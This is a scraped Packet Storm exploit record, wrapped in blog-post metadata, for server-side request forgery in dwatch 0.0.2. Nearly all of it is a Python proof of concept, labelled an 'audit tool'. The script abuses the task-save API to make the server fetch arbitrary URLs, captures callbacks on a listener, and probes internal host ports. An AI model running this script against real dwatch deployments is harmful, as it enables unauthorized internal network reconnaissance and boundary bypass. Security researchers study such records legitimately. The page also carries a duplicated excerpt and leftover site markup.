{“lastseen”:”2026-06-01T18:16:39″,”description”:”This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool”,”source”:””,”references”:””,”id”:”PACKETSTORM:222328″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/dhjz\/dwatch\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : a security utility to test network boundary enforcement and detect potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.\\n \\t\\t\\t\\t \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n \\n import re\\n import csv\\n import json\\n import time\\n import socket\\n import logging\\n import threading\\n import argparse\\n import urllib3\\n from pathlib import Path\\n from datetime import datetime\\n from typing import Dict, List, Optional, Tuple\\n from urllib.parse import urlparse, urljoin\\n import requests\\n \\n logging.basicConfig(level=logging.INFO, format=’%(asctime)s – [%(levelname)s] – %(message)s’)\\n logger = logging.getLogger(\\”DWatchAuditor\\”)\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n \\n class DWatchAuditorCore:\\n \\”\\”\\”Main engine: Responsible for managing the connection to the dwatch server and checking network restrictions.\\”\\”\\”\\n \\n def __init__(self, target: str, callback_host: Optional[str] = None,\\n callback_port: int = 8888, verbose: bool = False):\\n \\n parsed = urlparse(target if \\”:\/\/\\” in target else f\\”http:\/\/{target}\\”)\\n if not parsed.netloc:\\n raise ValueError(f\\”Invalid target URL structure: {target}\\”)\\n \\n path = parsed.path if parsed.path else \\”\\”\\n self.base_url = f\\”{parsed.scheme}:\/\/{parsed.netloc}{path}\\”.rstrip(\\”\/\\”)\\n \\n self.callback_host = callback_host\\n self.callback_port = callback_port\\n self.verbose = verbose\\n \\n self.session = requests.Session()\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor\/1.0’,\\n ‘Content-Type’: ‘application\/json’\\n })\\n \\n self.save_endpoint = urljoin(self.base_url + \\”\/\\”, \\”api\/task\/save\\”)\\n self.created_tasks: List[Dict] = []\\n \\n self.callback_event = threading.Event()\\n self.callback_data: List[Dict] = []\\n self.lock = threading.Lock()\\n \\n def _get_local_ip(self) -\\u003e str:\\n try:\\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\\n s.connect((\\”8.8.8.8\\”, 80))\\n return s.getsockname()[0]\\n except Exception:\\n return \\”127.0.0.1\\”\\n \\n def create_audit_task(self, name: str, payload_url: str, spec: str = \\”*\/5 * * * * *\\”) -\\u003e bool:\\n payload = {\\”name\\”: name, \\”url\\”: payload_url, \\”spec\\”: spec}\\n \\n try:\\n if self.verbose:\\n logger.info(f\\”Submitting audit payload: {name} -\\u003e {payload_url}\\”)\\n \\n response = self.session.post(self.save_endpoint, json=payload, timeout=10)\\n \\n if response.status_code == 200 and response.text:\\n logger.info(f\\”Audit task ‘{name}’ registered successfully.\\”)\\n self.created_tasks.append({‘name’: name, ‘url’: payload_url, ‘spec’: spec})\\n return True\\n \\n logger.error(f\\”Failed to create task. HTTP Status: {response.status_code}\\”)\\n return False\\n \\n except requests.RequestException as e:\\n logger.error(f\\”Network transport error during task creation: {e}\\”)\\n return False\\n \\n def verify_boundary_leak(self) -\\u003e bool:\\n if not self.callback_host:\\n self.callback_host = self._get_local_ip()\\n \\n timestamp = datetime.now().strftime(\\”%Y%m%d_%H%M%S\\”)\\n callback_url = f\\”http:\/\/{self.callback_host}:{self.callback_port}\/ssrf_token_{timestamp}\\”\\n \\n logger.info(f\\”Callback URL: {callback_url}\\”)\\n self.callback_event.clear()\\n \\n server_thread = threading.Thread(target=self._run_callback_socket)\\n server_thread.daemon = True\\n server_thread.start()\\n \\n time.sleep(0.5)\\n \\n task_name = f\\”Boundary_Audit_{timestamp}\\”\\n \\n if self.create_audit_task(task_name, callback_url, spec=\\”* * * * * *\\”):\\n logger.info(\\”Waiting for inbound connection (timeout 12s)…\\”)\\n \\n triggered = self.callback_event.wait(timeout=12)\\n \\n if triggered:\\n logger.critical(\\”SSRF outbound boundary breach confirmed!\\”)\\n self.callback_event.set()\\n server_thread.join(timeout=1)\\n return True\\n else:\\n logger.warning(\\”No inbound request captured.\\”)\\n self.callback_event.set()\\n server_thread.join(timeout=1)\\n return False\\n \\n return False\\n \\n def _run_callback_socket(self):\\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\\n \\n try:\\n server_socket.bind((\\”0.0.0.0\\”, self.callback_port))\\n server_socket.listen(1)\\n server_socket.settimeout(12)\\n \\n while not self.callback_event.is_set():\\n try:\\n client, addr = server_socket.accept()\\n self.callback_event.set()\\n \\n raw_request = client.recv(2048).decode(\\”utf-8\\”, errors=\\”ignore\\”)\\n \\n with self.lock:\\n self.callback_data.append({\\”sender\\”: addr, \\”raw\\”: raw_request})\\n \\n logger.info(f\\”Inbound connection from {addr[0]}:{addr[1]}\\”)\\n \\n try:\\n client.sendall(\\n b\\”HTTP\/1.1 200 OK\\\\r\\\\nConnection: close\\\\r\\\\nContent-Length: 0\\\\r\\\\n\\\\r\\\\n\\”\\n )\\n finally:\\n client.close()\\n \\n except socket.timeout:\\n continue\\n \\n except Exception as e:\\n logger.error(f\\”Callback listener error: {e}\\”)\\n \\n finally:\\n server_socket.close()\\n \\n def check_internal_service(self, host: str, port: int) -\\u003e Dict:\\n url = f\\”http:\/\/{host}:{port}\/\\”\\n task_name = f\\”service_recon_{port}_{int(time.time())}\\”\\n \\n success = self.create_audit_task(task_name, url, spec=\\”*\/5 * * * * *\\”)\\n \\n return {\\n \\”port\\”: port,\\n \\”task_accepted\\”: success,\\n \\”inference\\”: (\\n \\”Task submitted – requires log verification\\”\\n if success else \\”Blocked or unreachable endpoint\\”\\n )\\n }\\n \\n \\n class InteractiveConsoleInterface:\\n \\”\\”\\”User interface\\”\\”\\”\\n \\n def __init__(self, auditor: DWatchAuditorCore):\\n self.auditor = auditor\\n \\n def display_menu(self):\\n while True:\\n print(\\”\\\\n\\” + \\”=\\” * 50)\\n print(\\”dwatch SSRF Boundary Auditor\\”)\\n print(\\”=\\” * 50)\\n print(\\”1. Run SSRF Test\\”)\\n print(\\”2. Check Internal Port\\”)\\n print(\\”3. Create Task\\”)\\n print(\\”4. View Tasks\\”)\\n print(\\”5. Exit\\”)\\n \\n choice = input(\\”\\u003e \\”).strip()\\n \\n if choice == \\”1\\”:\\n self.auditor.verify_boundary_leak()\\n \\n elif choice == \\”2\\”:\\n host = input(\\”Host: \\”).strip() or \\”127.0.0.1\\”\\n try:\\n port = int(input(\\”Port: \\”).strip())\\n except ValueError:\\n print(\\”Invalid port\\”)\\n continue\\n \\n print(json.dumps(self.auditor.check_internal_service(host, port), indent=2))\\n \\n elif choice == \\”3\\”:\\n name = input(\\”Task name: \\”).strip()\\n url = input(\\”URL: \\”).strip()\\n self.auditor.create_audit_task(name, url)\\n \\n elif choice == \\”4\\”:\\n print(json.dumps(self.auditor.created_tasks, indent=2))\\n \\n elif choice == \\”5\\”:\\n break\\n \\n \\n def main():\\n parser = argparse.ArgumentParser()\\n parser.add_argument(\\”-t\\”, \\”–target\\”, required=True)\\n parser.add_argument(\\”-c\\”, \\”–callback\\”)\\n parser.add_argument(\\”-i\\”, \\”–interactive\\”, action=\\”store_true\\”)\\n parser.add_argument(\\”-v\\”, \\”–verbose\\”, action=\\”store_true\\”)\\n args = parser.parse_args()\\n \\n callback_host = None\\n callback_port = 8888\\n \\n if args.callback:\\n parts = args.callback.rsplit(\\”:\\”, 1)\\n callback_host = parts[0]\\n if len(parts) == 2:\\n callback_port = int(parts[1])\\n \\n try:\\n auditor = DWatchAuditorCore(\\n target=args.target,\\n callback_host=callback_host,\\n callback_port=callback_port,\\n verbose=args.verbose\\n )\\n \\n if args.interactive:\\n InteractiveConsoleInterface(auditor).display_menu()\\n else:\\n logger.info(\\”Running SSRF boundary check…\\”)\\n auditor.verify_boundary_leak()\\n \\n except Exception as e:\\n logger.critical(f\\”Fatal error: {e}\\”)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222328″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222328\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-01T18:16:39″,”description”:”This is an auditing tool to analyze server-side request forgery vulnerabilities in dwatch version 0.0.2…”,”published”:”2026-06-01T00:00:00″,”modified”:”2026-06-01T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool”,”source”:””,”references”:””,”id”:”PACKETSTORM:222328″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n |…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-58920","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n